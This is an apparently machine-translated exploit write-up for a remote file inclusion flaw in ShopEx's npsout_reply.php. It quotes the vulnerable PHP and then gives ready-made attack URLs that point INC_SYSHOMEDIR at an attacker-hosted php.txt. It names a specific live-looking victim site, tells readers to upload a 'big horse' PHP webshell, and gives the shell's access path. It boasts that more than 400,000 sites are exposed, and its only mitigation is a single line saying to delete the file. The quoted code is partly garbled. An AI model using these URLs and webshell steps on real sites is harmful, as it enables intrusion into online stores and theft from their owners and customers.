Vulnerability platform: SHOPEX
Harm degree: ★★★★☆
About Shopex:
Shopex is a comprehensive provider of online shopping software and technical services, Shopex as the pioneer and practitioner of domestic shopping software, it provides the related services from shopping software (including online store, online shopping mall, online store multi-store system) to relevant supporting service (shop promotion, template design, flow monitoring, business intelligence analysis, Online payment, shop interconnection, shopping system customization development, etc., as well as in-depth e-commerce technology services.
The principle of vulnerability:
Look here:/shop/npsout_reply.php
Include_once ($INC _syshomedir.) Include/payfunction.php ");
=========================== the information about the merchant back to =======================
Receiving the component's encryption
$OrderInfo = $_post[' ordermessage ']; Order encryption Information
$SIGNMSG = $_post[' Digest ']; Secret Spoon
$m _id = $_post[' m_id '];
=========================== Start Encryption ====================================
Check signature
$shopPayment = Newclass ("shoppayment");
$key = $shopPayment->getkey ($INC _shopid, $m _id, "nps_out");
$digest = MD5 ($OrderInfo. $key);
Var_dump ($_post);
if ($digest = = $SIGNMSG)
{
Restore Hex to Characters
$OrderInfo = Hextostr ($OrderInfo);
Des decryption
$recovered _message = des ($key, $OrderInfo, 0, 1, NULL);
echo "DES Test decrypted:". $recovered _message;
$orderArray = Split (' [|] ', $recovered _message);
$m _id = $orderArray [0];
$m _orderid = $orderArray [1];
$m _oamount = $orderArray [2];
$m _ocurrency = $orderArray [3];
$m _url = $orderArray [4];
M_txcode = array[5];
$m _language = $orderArray [5];
$s _name = $orderArray [6];
$s _addr = $orderArray [7];
$s _postcode = $orderArray [8];
$s _tel = $orderArray [9];
$s _eml = $orderArray [10];
$r _name = $orderArray [11];
$r _addr = $orderArray [12];
$r _postcode = $orderArray [13];
$r _tel = $orderArray [14];
$r _eml = $orderArray [15];
$m _ocomment = $orderArray [16];
$modate = $orderArray [17];
$Status = $orderArray [18];
if ($Status = = 2)
{
$Order = Newclass ("Order");
$Order->shopid = $INC _shopid;
$Order->payid = $m _orderid;
$arr _paytime = Getunixtime (); Payment Time
$Order->onlinepayed ($arr _paytime[0], $arr _paytime[1]);
$tmp _orderno = $Order->getorderidbypayid ($Order->payid); Take out the store order number
$state = 2;
$strinfo = $PROG _tags["ptag_1334"];
}
else{
$state = 1;
$strinfo = $PROG _tags["ptag_1335"];
}
}else{
$state = 0;
$strinfo = $PROG _tags["ptag_1336"];
}
Header ("Location:./index.php?goo=pay_reply.dwt&orderid=". $tmp _orderno. " &state= ". $state." &strinfo= ". UrlEncode ($strinfo));
?>
Suppose there is an include folder in the http://www.sagi.net.cn root directory, which has payfunction.php files (this is our own construction, of course, the contents of the file but the pony is also a big horse hehe)
We can use the following methods to http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn
Simply put, remote attackers can exploit vulnerabilities to execute arbitrary PHP commands with Web process privileges. The specific scenario is that the ' npsout_reply.php ' script lacks filtering for the user-submitted ' npsout_root_path ' parameter specifies any file on the remote server as the containing object that can cause arbitrary PHP code to execute with Web permissions
Exploit combat:
Construct URL:
Http://www.xxxx.com/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?
Attention:
[Http://www.sagi.net.cn/php.txt?] is not actually executed on the server where the http://www.sagi.net.cn resides, but on "http://www.xxxx.com".
To put it simply. Through the Shopex system, I executed the code on the U.S. server on the Chinese server. And the owner of this code is the U.S. server. Is executed on a Chinese server.
So I execute the command on the Chinese server. America's servers perform their tasks obediently. It's as simple as that.
Vulnerability Experiment:
Can find 40多万个 use this system station. It means that the 40多万个 station will be lost.
After the target station, add:/shop/npsout_reply.php?inc_syshomedir=http://www.sagi.net.cn/php.txt?
There is a remote implementation of the PHP Big horse screen.
such as: Http://www.oicqshop.com/oicqshop/shop/npsout_reply.php?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?
Then upload the PHP big horse, it's OK.
Visits: such as: http://www.oicqshop.com/oicqshop/shop/bsthacker.php
As for the solution, the official did not announce it.
You can delete the npsout_reply.php file in the shop directory.